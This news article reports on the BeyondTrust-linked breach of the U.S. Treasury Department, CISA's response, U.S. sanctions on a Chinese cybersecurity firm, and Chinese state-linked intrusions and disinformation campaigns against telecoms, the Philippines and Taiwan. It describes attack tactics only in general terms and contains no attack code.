The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced on Monday that the recent cyber attack on the Treasury Department did not affect other federal agencies. The agency reassured that no evidence has emerged suggesting a broader impact across the federal government.
CISA is closely collaborating with the Treasury Department and BeyondTrust, a cybersecurity solutions provider, to investigate the breach, understand its full scope, and mitigate potential consequences. “The security of federal systems and the data they protect is paramount to national security,” CISA stated, emphasizing its commitment to preventing further incidents. The agency promised to continue monitoring the situation and provide updates when necessary.
The incident follows a declaration by the Treasury Department last week acknowledging that it had been the target of a “major cybersecurity attack.” Preliminary investigations revealed that Chinese state-sponsored hackers exploited a vulnerability, enabling them to gain remote access to specific computers and unclassified information.
Breach Details and BeyondTrust’s Response
The attack reportedly began in early December 2024 and involved the compromise of BeyondTrust’s systems. Hackers used a compromised Remote Support SaaS API key to infiltrate certain Remote Support SaaS instances. BeyondTrust issued an updated statement on January 6, 2025, confirming that no additional affected customers had been identified beyond those previously notified.
Despite mounting evidence pointing to state-sponsored Chinese attackers, China has denied the accusations. Chinese officials have labeled the allegations as unfounded and politically motivated.
Sanctions Against Chinese Cybersecurity Firm
In a related development, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) imposed sanctions last week on Integrity Technology Group, a Chinese cybersecurity firm. The company is accused of providing infrastructure support to Flax Typhoon, a hacking group allegedly involved in attacks on U.S. critical infrastructure.
Reacting to the sanctions, Chinese Foreign Ministry spokesperson Guo Jiakun reiterated China’s stance, saying, “China has always firmly opposed hacking and has consistently combated it in accordance with the law.” Jiakun further accused the U.S. of using cybersecurity issues as a pretext to unjustly sanction Chinese companies and warned that China would take necessary measures to protect its interests.
Integrity Technology Group, in its response, dismissed the U.S. allegations, stating they lack factual basis. The company also filed a formal protest with the Shanghai Stock Exchange.
Escalating Chinese Cyber Threats
The cyber attack on the Treasury Department is part of a larger pattern of intrusions attributed to Chinese hacking groups. Notable among them are Volt Typhoon and Salt Typhoon, known for targeting U.S. critical infrastructure and telecommunications networks, respectively.
Over the weekend, The Wall Street Journal reported that nine telecom companies, including Charter Communications, Consolidated Communications, and Windstream, had been breached by Salt Typhoon. Previously identified victims included major telecom operators like AT&T, T-Mobile, Verizon, and Lumen Technologies.
APT41 Campaign in the Philippines
In a separate revelation, Bloomberg disclosed a new report highlighting the activities of APT41, another Chinese state-sponsored threat actor. Between early 2023 and June 2024, APT41 allegedly infiltrated the executive branch of the Philippine government, stealing sensitive data related to ongoing territorial disputes in the South China Sea. This campaign is believed to be part of China’s broader cyber espionage efforts in the region.
Taiwan: A Growing Target
Meanwhile, Taiwan’s National Security Bureau (NSB) has issued a warning about the rising frequency and sophistication of cyber attacks from China. The bureau reported 906 cyber incidents against government and private entities in 2024, marking a significant increase from 752 incidents in 2023.
Chinese threat actors reportedly use a variety of tactics to gain unauthorized access to critical systems in Taiwan. These include exploiting vulnerabilities in network communication devices and employing “living-off-the-land” (LotL) techniques, which involve leveraging legitimate tools and processes to avoid detection.
Attack chains often begin with spear-phishing emails targeting civil servants, followed by lateral movement within compromised networks to steal sensitive information.
Notable Chinese Cyber Attacks on Taiwan
The NSB identified several prominent types of attacks directed at Taiwan:
- DDoS Attacks: Distributed denial-of-service (DDoS) attacks against Taiwan’s transportation and financial sectors coincided with military exercises by the People’s Liberation Army (PLA).
- Ransomware Attacks: The manufacturing sector has been hit by ransomware campaigns aimed at disrupting production and extracting ransoms.
- High-Tech Espionage: Chinese hackers have targeted high-tech startups to steal proprietary technologies and intellectual property.
- Personal Data Theft: Personal information belonging to Taiwanese citizens has been exfiltrated and subsequently sold on underground forums.
- Disinformation Campaigns: China has been accused of spreading false information on social media to undermine public trust in the government.
The NSB also noted a 650% increase in attacks targeting the telecommunications sector, while attacks on the transportation and defense supply chain sectors have risen by 70% and 57%, respectively.
Influence Operations and Disinformation
Beyond cyber intrusions, China is said to be actively conducting influence operations in Taiwan. These efforts aim to manipulate public opinion and create social divisions by spreading disinformation through inauthentic accounts on platforms like Facebook and X (formerly Twitter).
A notable tactic involves hijacking Taiwanese social media accounts to post misleading information. The NSB reported several instances of deepfake videos featuring fabricated speeches by prominent Taiwanese political figures designed to confuse and mislead the public.
Additionally, China has allegedly set up proxy accounts and media brands on platforms such as Weibo, TikTok, and Instagram. These accounts are reportedly used to promote pro-China narratives and spread propaganda targeting the Taiwanese populace.
Conclusion
The ongoing investigation into the Treasury Department cyber attack underscores the growing threat posed by state-sponsored cyber adversaries. With mounting evidence pointing to Chinese involvement, tensions between the U.S. and China over cybersecurity are likely to escalate further. Simultaneously, the reports from Taiwan highlight the multifaceted nature of modern cyber warfare, encompassing both direct intrusions and influence operations aimed at destabilizing societies.
As cyber attacks continue to rise in frequency and sophistication, the need for robust international cybersecurity collaboration and stronger defensive measures has never been more critical.